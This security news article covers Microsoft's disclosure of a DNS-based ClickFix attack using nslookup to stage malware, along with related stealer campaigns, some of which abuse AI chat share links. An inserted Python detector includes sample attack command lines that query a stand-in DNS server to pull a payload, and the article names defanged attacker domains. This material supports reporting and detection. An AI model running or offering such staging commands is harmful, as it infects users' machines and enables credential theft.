Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging

By The Hacker News
February 15, 2026

Microsoft has disclosed details of a new version of the ClickFix social engineering tactic in which the attackers trick unsuspecting users into running commands that carry out a Domain Name System (DNS) lookup to retrieve the next-stage payload.

Specifically, the attack relies on using the “nslookup” (short for nameserver lookup) command to execute a custom DNS lookup triggered via the Windows Run dialog.

ClickFix is an increasingly popular technique that’s traditionally delivered via phishing, malvertising, or drive-by download schemes, often redirecting targets to bogus landing pages that host fake CAPTCHA verification or instructions to address a non-existent problem on their computers by running a command either through the Windows Run dialog or the macOS Terminal app.

The attack method has become widespread over the past two years since it hinges on the victims infecting their own machines with malware, thereby allowing the threat actors to bypass security controls. The effectiveness of ClickFix has been such that it has spawned several variants, such as FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.

“In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system’s default resolver,” the Microsoft Threat Intelligence team said in a series of posts on X. “The output is filtered to extract the `Name:` DNS response, which is executed as the second-stage payload.”

Microsoft said this new variation of ClickFix uses DNS as a “lightweight staging or signaling channel,” enabling the threat actor to reach infrastructure under their control, as well as erect a new validation layer before executing the second-stage payload.

“Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic,” the Windows maker added.
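As an added example (not code from the Microsoft post or this article), the following detector turns the command shape described above into a triage rule and runs it over constructed process-creation records: it flags nslookup invocations that name an explicit server outside RFC 1918/loopback space and pipe the output through a filter for the `Name:` line. The record layout, the Sysmon-style parent/image fields and every sample value are assumptions.

```python
import re

# Constructed process-creation records (parent image, image, command line), the
# fields a Sysmon Event ID 1 export carries. Not real telemetry: the server IP is
# from the TEST-NET-3 range and the looked-up name uses the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ("explorer.exe", "cmd.exe", "cmd.exe /c nslookup -type=txt lookup.example.invalid 203.0.113.7 | findstr Name:"),
    ("explorer.exe", "cmd.exe", "cmd.exe /c nslookup lookup.example.invalid 203.0.113.7"),
    ("powershell.exe", "nslookup.exe", "nslookup -type=mx example.com 10.0.0.53"),
    ("cmd.exe", "nslookup.exe", "nslookup www.example.com"),
]

NSLOOKUP_ARGS = re.compile(r"\bnslookup(?:\.exe)?\s+([^|&]*)", re.I)
NAME_FILTER = re.compile(r"\b(?:findstr|find)\b[^|&]*\bName:", re.I)
IPV4 = re.compile(r"^(\d{1,3})\.(\d{1,3})\.\d{1,3}\.\d{1,3}$")

def nslookup_server(cmdline):
    """Explicit server argument of an nslookup call, or None.

    Syntax is nslookup [-opt ...] host [server]; a second positional argument
    means the query bypasses the host's configured resolver."""
    m = NSLOOKUP_ARGS.search(cmdline)
    if not m:
        return None
    positional = [t for t in m.group(1).split() if not t.startswith("-")]
    return positional[1] if len(positional) >= 2 else None

def is_internal_ip(server):
    """RFC 1918 or loopback literal; a deliberate simplification of 'internal'."""
    m = IPV4.match(server)
    if not m:
        return False  # hostnames and anything else count as external here
    a, b = int(m.group(1)), int(m.group(2))
    return a in (10, 127) or (a == 172 and 16 <= b <= 31) or (a == 192 and b == 168)

def classify(parent, image, cmdline):
    """Return 'high', 'medium' or 'none' for one process-creation record."""
    server = nslookup_server(cmdline)
    if server is None or is_internal_ip(server):
        return "none"
    if NAME_FILTER.search(cmdline):
        return "high"    # resolver bypass plus output harvested for the Name: line
    if parent.lower() == "explorer.exe" and image.lower() == "cmd.exe":
        return "medium"  # resolver bypass launched from an interactive Run/cmd session
    return "none"

if __name__ == "__main__":
    for parent, image, cmdline in SAMPLE_EVENTS:
        print(classify(parent, image, cmdline), cmdline)
```

The "medium" tier will also catch administrators who legitimately query a specific public resolver, so in production it belongs in a hunting query rather than an alert.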

The downloaded payload subsequently initiates an attack chain that leads to the download of a ZIP archive from an external server (“azwsappdev[.]com”), from which a malicious Python script is extracted and run to conduct reconnaissance, run discovery commands, and drop a Visual Basic Script (VBScript) responsible for launching ModeloRAT, a Python-based remote access trojan previously distributed through CrashFix.

To establish persistence, a Windows shortcut (LNK) file pointing to the VBScript is created in the Windows Startup folder so that the malware is automatically launched every time the operating system is started. 

The disclosure comes as Bitdefender warned of a surge in Lumma Stealer activity, driven by ClickFix-style fake CAPTCHA campaigns that deploy an AutoIt version of CastleLoader, a malware loader associated with a threat actor codenamed GrayBravo (formerly TAG-150).

CastleLoader incorporates checks to determine the presence of virtualization software and specific security programs before decrypting and launching the stealer malware in memory. Outside of ClickFix, websites advertising cracked software and pirated movies serve as bait for CastleLoader-based attack chains, deceiving users into downloading rogue installers or executables masquerading as MP4 media files.

Other CastleLoader campaigns have also leveraged websites promising cracked software downloads as a starting point to distribute a fake NSIS installer that also runs obfuscated VBA scripts prior to running the AutoIt script that loads Lumma Stealer. The VBA loader is designed to run scheduled tasks responsible for ensuring persistence.

“Despite significant law enforcement disruption efforts in 2025, Lumma Stealer operations continued, demonstrating resilience by rapidly migrating to new hosting providers and adapting alternative loaders and delivery techniques,” the Romanian cybersecurity company said. “At the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer spread through delivery chains.”

Interestingly, one of the domains on CastleLoader’s infrastructure (“testdomain123123[.]shop”) was flagged as a Lumma Stealer command-and-control (C2), indicating that the operators of the two malware families are either working together or sharing service providers. The majority of Lumma Stealer infections have been recorded in India, followed by France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.

“The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities,” Bitdefender said. “The instructions resemble troubleshooting steps or verification workarounds that users may have encountered previously. As a result, victims often fail to recognize that they are manually executing arbitrary code on their own system.”

CastleLoader is not the only loader that’s being used to distribute Lumma Stealer. Campaigns observed as early as March 2025 have leveraged another loader dubbed RenEngine Loader, with the malware propagated under the guise of game cheats and pirated software like CorelDRAW graphics editor. In these attacks, the loader makes way for a secondary loader named Hijack Loader, which then deploys Lumma Stealer.

According to data from Kaspersky, RenEngine Loader attacks have primarily affected users in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France since March 2025.

The developments coincide with the emergence of various campaigns using social engineering lures, including ClickFix, to deliver a variety of stealers and malware loaders:

  • A macOS campaign that has used phishing and malvertising ploys to deliver Odyssey Stealer, a rebrand of Poseidon Stealer, which itself is a fork of Atomic macOS Stealer (AMOS). The stealer exfiltrates credentials and data from 203 browser wallet extensions and 18 desktop wallet applications to facilitate cryptocurrency theft.
  • “Beyond credential theft, Odyssey operates as a full remote access trojan,” Censys said. “A persistent LaunchDaemon polls the C2 every 60 seconds for commands, supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines.”
  • A ClickFix attack chain targeting Windows systems that uses fake CAPTCHA verification pages on legitimate-but-compromised websites to trick users into executing PowerShell commands that deploy the StealC information stealer.
  • An email phishing campaign that uses a malicious SVG file contained within a password-protected ZIP archive to instruct the victim to run a PowerShell command using ClickFix, ultimately resulting in the deployment of an open-source .NET infostealer called Stealerium.
  • A campaign that exploits the public sharing feature of generative artificial intelligence (AI) services like Anthropic Claude to stage malicious ClickFix instructions on how to perform a variety of tasks on macOS (e.g., “online DNS resolver”), and distribute these links via sponsored results on search engines like Google to deploy Atomic Stealer and MacSync Stealer.
  • A campaign that directs users searching for “macOS cli disk space analyzer” to a fake Medium article impersonating Apple’s Support Team to deceive them into running ClickFix instructions that deliver next-stage stealer payloads from an external server “raxelpak[.]com.”
  • “The C2 domain raxelpak[.]com has URL history going back to 2021, when it appeared to host a safety workwear e-commerce site,” MacPaw’s Moonlock Lab said. “Whether the domain was hijacked or simply expired and re-registered by the [threat actor] is unclear, but it fits the broader pattern of leveraging aged domains with existing reputation to avoid detection.”
  • A variation of the same campaign that stages ClickFix instructions for supposedly installing Homebrew on links associated with Claude and Evernote through sponsored results to install stealer malware.
  • “The ad shows a real, recognized domain (claude.ai), not a spoof or typo-squatted site,” AdGuard said. “Clicking the ad leads to a real Claude page, not a phishing copy. The consequence is clear: Google Ads + a well-known trusted platform + technical users with high downstream impact = a potent malware distribution vector.”
  • A macOS email phishing campaign that prompts recipients to download and run an AppleScript file to address supposed compatibility issues, resulting in the deployment of another AppleScript designed to steal credentials and retrieve additional JavaScript payloads.
  • “The malware does not grant permissions to itself; instead, it forges TCC authorizations for trusted Apple-signed binaries (Terminal, osascript, Script Editor, and bash) and then executes malicious actions through these binaries to inherit their permissions,” Darktrace said.
  • A ClearFake campaign that employs fake CAPTCHA lures on compromised WordPress sites to trigger the execution of an HTML Application (HTA) file and deploy Lumma Stealer. The campaign is also known to use malicious JavaScript injections to take advantage of a technique known as EtherHiding to execute a contract hosted on the BNB Smart Chain and fetch an unknown payload hosted on GitHub.
  • EtherHiding offers attackers several advantages, allowing malicious traffic to blend with legitimate Web3 activity. Because blockchain is immutable and decentralized, it offers increased resilience in the face of takedown efforts.

A recent analysis published by Flare has found that threat actors are increasingly targeting Apple macOS with infostealers and sophisticated tools.

“Nearly every macOS stealer prioritizes cryptocurrency theft above all else,” the company said. “This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse.”

“The ‘Macs don’t get viruses’ assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage.”
